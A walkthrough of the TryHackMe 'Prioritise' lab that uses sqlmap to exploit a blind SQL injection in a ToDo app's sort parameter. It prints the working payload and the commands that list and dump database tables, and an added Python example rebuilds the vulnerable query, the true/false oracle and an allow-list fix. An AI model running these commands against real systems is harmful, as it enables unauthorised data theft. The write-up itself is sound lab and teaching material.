Prioritise TryHackMe Writeup using SQLMap

CTF Writeup / Walkthrough for Prioritise using SQLMap

Last updated 1 year ago

Initial Recon

We will use rustscan for port discovery

rustscan -a TARGET_IP -- -A -sC

The scan returns the following:

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 bc7ecc46211d6323652a21383e418c70 (RSA)
| ssh-rsa [public key omitted]
|   256 ea203ed1c491e879ef2d339bf11caf10 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHGWPtvoLcSuiPd+wNAPJ0qq3EEUNg8064D1mn6y6gEShvcHKz+xLg6p3ZgfDZvtYOwtbZ5sn7StlwpFExuJiCE=
|   256 c998ec9871424589e1222a32c4d2c01d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXA8smlcww1+5QTpnojr12eGZDWr//L/ghypXrbf17Z
80/tcp open  rtsp    syn-ack
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-title: Prioritise
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2756
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="../static/css/bootstrap.min.css"
|     crossorigin="anonymous"
|     <link
|     rel="stylesheet"
|     href="../static/css/font-awesome.min.css"
|     crossorigin="anonymous"
|     <link
|     rel="stylesheet"
|     href="../static/css/bootstrap-datepicker.min.css"
|     crossorigin="anonymous"
|     <title>Prioritise</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">Prioritise</span></a>
|     <button
|     class="na
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|   RTSPRequest: 
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|_    Content-Length: 0

Although nmap labels port 80 as rtsp, the fingerprint shows a plain HTTP server running a ToDo application, and SSH on port 22. There is only this single web application to look at, nothing else of interest.

Let's head over to the ToDo app!

Let's add a few items to the list.

As you can see, I tried an XSS payload and an SQL injection payload, but neither succeeded.

Let's try the sort option in the application.

Sorting is submitted as a plain GET request with an order parameter (?order=date), which makes it a promising injection point: a sort column is likely spliced straight into an ORDER BY clause, where parameter binding cannot be used.

We can now use SQLMap to do the job.

Attack Phase

Firing up SQLMap

sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3

We are using SQLMap because we want an automated solution for a blind SQL injection, which would take a lot of time to exploit by hand.

After some time, sqlmap finds a valid payload:

[22:19:06] [INFO] checking if the injection point on GET parameter 'order' is a false positive
GET parameter 'order' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 807 HTTP(s) requests:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
    Payload: order=date AND CASE WHEN 3835=3835 THEN 3835 ELSE JSON(CHAR(88,99,121,110)) END
---
[22:19:14] [INFO] the back-end DBMS is SQLite
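To make the payload above concrete, here is an added Python example (not code from the room, the ToDo application, or sqlmap) that models what the app's sort handler is assumed to look like: a SQLite query whose ORDER BY clause is built by string concatenation, which is why the order parameter is injectable. The todos and flag tables and their rows are constructed for the example, and the hypothetical sort_todos_safe shows the allow-list fix a defender would apply. The blind_oracle function reproduces sqlmap's exact CASE/JSON trick: when the condition is true the query sorts normally; when it is false, SQLite evaluates JSON(CHAR(88,99,121,110)), i.e. JSON('Xcyn'), which is not valid JSON, so the query raises an error and the response differs. It relies on SQLite's JSON function, which is built in to current SQLite releases.

```python
import sqlite3


# Constructed in-memory stand-in for the room's ToDo app database. The table
# and column names are assumptions based on the ?order=date request and on
# sqlmap's table listing (todos, flag); the rows are made up for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE todos (id INTEGER PRIMARY KEY, title TEXT, date TEXT)")
    conn.executemany(
        "INSERT INTO todos (title, date) VALUES (?, ?)",
        [("write report", "2023-01-02"), ("patch server", "2023-01-01")],
    )
    conn.execute("CREATE TABLE flag (flag TEXT)")
    conn.execute("INSERT INTO flag VALUES ('flag{constructed_example}')")
    return conn


def sort_todos_vulnerable(conn, order):
    """Hypothetical vulnerable handler: a sort column cannot be bound as a
    parameter, so the user-supplied value is concatenated into the SQL text.
    Anything after the column name becomes part of the ORDER BY expression."""
    sql = "SELECT title, date FROM todos ORDER BY " + order
    return conn.execute(sql).fetchall()


# Fix: map the request value onto a fixed set of column names and reject the rest.
ALLOWED_ORDER = {"date": "date", "title": "title", "id": "id"}


def sort_todos_safe(conn, order):
    """Hardened handler: only allow-listed identifiers ever reach the query."""
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError(f"unsupported sort column: {order!r}")
    return conn.execute(f"SELECT title, date FROM todos ORDER BY {column}").fetchall()


def blind_oracle(conn, condition):
    """Reproduce the oracle behind sqlmap's payload. CASE evaluates only the
    branch that is taken: a true condition yields the constant 3835 and the
    query succeeds; a false condition evaluates JSON('Xcyn'), which is
    malformed JSON, so SQLite raises an error and the page would fail."""
    payload = (
        f"date AND CASE WHEN {condition} THEN 3835 "
        "ELSE JSON(CHAR(88,99,121,110)) END"
    )
    try:
        sort_todos_vulnerable(conn, payload)
        return True
    except sqlite3.Error:
        return False


if __name__ == "__main__":
    db = make_db()
    print(sort_todos_vulnerable(db, "date"))  # normal sort by date
    print(blind_oracle(db, "3835=3835"))      # True: query sorts normally
    print(blind_oracle(db, "3835=3836"))      # False: malformed JSON error
    print(sort_todos_safe(db, "date"))        # same rows from the fixed handler
    try:
        sort_todos_safe(db, "date AND 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The allow-list is the right fix here because identifiers (column names, sort direction) cannot be parameterised; validating the value against a short dictionary removes the injection surface entirely, whereas escaping or quoting the value would only produce a broken query.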

Let's enumerate the tables now. Since this is a blind SQL injection, each request only answers a single true/false question, so we can use threads to speed the process up.

sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3 --tables --threads 10
[2 tables]
+-------+
| flag  |
| todos |
+-------+

Now we can dump the flag table with the following command:

sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3 -T flag --threads 10 --dump

We now have the flag!

[22:22:51] [INFO] retrieved: 38
[22:23:04] [INFO] retrieved: flag{65f2f8cfd53d59422f3_REDACTED}             
Database: <current>
Table: flag
[1 entry]
+----------------------------------------+
| flag                                   |
+----------------------------------------+
| flag{65f2f8cfd53d59422f3_REDACTED} |
+----------------------------------------+

Happy hunting, cheers!
